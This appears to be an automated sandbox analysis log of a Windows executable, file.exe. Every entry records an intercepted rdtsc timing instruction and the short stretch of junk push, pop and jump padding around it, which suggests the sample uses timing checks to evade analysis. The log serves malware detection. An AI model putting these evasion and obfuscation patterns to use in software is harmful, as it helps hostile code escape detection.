Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FDA2 second address: F7FDD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F4FE915D6B3h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F4FE915D6B4h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FDD5 second address: F7FDE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F4FE9502C56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FDE0 second address: F7FDE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FDE9 second address: F7FDED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FDED second address: F7FDF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FDF1 second address: F7FE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jng 00007F4FE9502C56h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FE07 second address: F7FE1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B1h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8581C second address: F85820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85820 second address: F8582A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4FE915D6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8A904 second address: F8A923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F4FE9502C5Fh 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007F4FE9502C56h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8A923 second address: F8A927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89D89 second address: F89D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89D8D second address: F89D93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89D93 second address: F89D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89D9B second address: F89D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89F0A second address: F89F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4FE9502C69h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89F28 second address: F89F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F4FE915D6A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8A079 second address: F8A0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE9502C5Ch 0x00000009 pop ecx 0x0000000a jmp 00007F4FE9502C67h 0x0000000f jns 00007F4FE9502C5Eh 0x00000015 pushad 0x00000016 jmp 00007F4FE9502C5Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8A0C1 second address: F8A0C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8A0C9 second address: F8A0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 js 00007F4FE9502C6Ah 0x0000000c je 00007F4FE9502C58h 0x00000012 jne 00007F4FE9502C5Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D08A second address: F8D0A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D0A2 second address: F8D0F9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4FE9502C5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F4FE9502C68h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push ebx 0x00000016 push ecx 0x00000017 jmp 00007F4FE9502C67h 0x0000001c pop ecx 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jbe 00007F4FE9502C68h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D0F9 second address: F8D0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D0FD second address: F8D101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D101 second address: F8D140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F4FE915D6A8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 movsx esi, si 0x00000024 mov dword ptr [ebp+122D5B45h], edx 0x0000002a call 00007F4FE915D6A9h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D140 second address: F8D146 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D146 second address: F8D194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4FE915D6AAh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jmp 00007F4FE915D6B0h 0x00000019 push ebx 0x0000001a pushad 0x0000001b popad 0x0000001c pop ebx 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 pop eax 0x00000025 jbe 00007F4FE915D6A6h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D194 second address: F8D1B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4FE9502C64h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D1B6 second address: F8D1BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D1BC second address: F8D1C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D1C0 second address: F8D1C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D3A6 second address: F8D3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8D3AB second address: F8D3C0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4FE915D6ACh 0x00000008 jg 00007F4FE915D6A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8DD36 second address: F8DD3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8DD3C second address: F8DD40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8DD40 second address: F8DDA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007F4FE9502C6Fh 0x0000000f xchg eax, ebx 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F4FE9502C58h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov si, E32Bh 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F4FE9502C68h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8DDA6 second address: F8DDAB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8E23B second address: F8E23F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8E2AC second address: F8E2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8E2B3 second address: F8E2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE9502C5Bh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8E395 second address: F8E3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4FE915D6AFh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8E828 second address: F8E82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8E82C second address: F8E896 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4FE915D6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F4FE915D6B0h 0x00000013 jg 00007F4FE915D6A6h 0x00000019 popad 0x0000001a pop edx 0x0000001b nop 0x0000001c and di, 6660h 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F4FE915D6A8h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 0000001Bh 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d movzx edi, ax 0x00000040 push 00000000h 0x00000042 mov di, 66DBh 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F4FE915D6ADh 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8E896 second address: F8E89B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8F375 second address: F8F390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4FE915D6ACh 0x0000000a jnc 00007F4FE915D6A6h 0x00000010 popad 0x00000011 push eax 0x00000012 jc 00007F4FE915D6B0h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8F18E second address: F8F194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8FA99 second address: F8FAA2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9188D second address: F91891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F91891 second address: F918AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F4FE915D6ACh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F918AB second address: F918B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4FE9502C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F92347 second address: F92398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F4FE915D6ACh 0x0000000b popad 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D18E8h], esi 0x00000013 push 00000000h 0x00000015 mov di, F6D0h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F4FE915D6A8h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 or dword ptr [ebp+12454AC0h], ebx 0x0000003b xchg eax, ebx 0x0000003c je 00007F4FE915D6B8h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F92398 second address: F9239C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9239C second address: F923A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F92D54 second address: F92DC4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4FE9502C5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c jmp 00007F4FE9502C5Fh 0x00000011 pop ebx 0x00000012 nop 0x00000013 jmp 00007F4FE9502C68h 0x00000018 push 00000000h 0x0000001a jg 00007F4FE9502C62h 0x00000020 push 00000000h 0x00000022 add dword ptr [ebp+122D1B2Ch], esi 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jc 00007F4FE9502C66h 0x00000031 jmp 00007F4FE9502C60h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9390E second address: F93913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F95535 second address: F9553F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4FE9502C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9553F second address: F95549 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4FE915D6ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F96D29 second address: F96D32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F96D32 second address: F96D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97C71 second address: F97C7B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4FE9502C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F96E8A second address: F96E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97C7B second address: F97CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jg 00007F4FE9502C56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F4FE9502C67h 0x00000014 nop 0x00000015 jmp 00007F4FE9502C5Ah 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F4FE9502C5Dh 0x00000022 mov di, si 0x00000025 pop ebx 0x00000026 pop edi 0x00000027 push 00000000h 0x00000029 adc di, 8FC8h 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97CCE second address: F97CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F96F5F second address: F96F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97CD3 second address: F97CD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98C70 second address: F98C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007F4FE9502C56h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97E1E second address: F97E24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97E24 second address: F97E36 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4FE9502C58h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97E36 second address: F97E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE915D6B8h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97F13 second address: F97F18 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98F0B second address: F98F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9C9E0 second address: F9C9E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9C9E6 second address: F9C9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9C9EA second address: F9C9EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9C9EE second address: F9CA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4FE915D6B9h 0x0000000e nop 0x0000000f add ebx, dword ptr [ebp+122D18C6h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F4FE915D6A8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 xor edi, 4461C77Ch 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007F4FE915D6A8h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 0000001Dh 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 pushad 0x0000005a popad 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9CA73 second address: F9CA7D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4FE9502C5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9D93B second address: F9D93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9D93F second address: F9D9B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc ebx, 7D866DE0h 0x00000012 push 00000000h 0x00000014 mov edi, edx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F4FE9502C58h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov di, bx 0x00000035 xchg eax, esi 0x00000036 jmp 00007F4FE9502C69h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F4FE9502C5Ch 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9CBDF second address: F9CBE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9CBE4 second address: F9CC05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4FE9502C63h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9CC05 second address: F9CC09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9CC09 second address: F9CC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9CC0F second address: F9CC22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6AFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9E8A2 second address: F9E8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9DBA3 second address: F9DBA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9DBA7 second address: F9DBAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9DBAB second address: F9DBB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA0844 second address: FA0853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
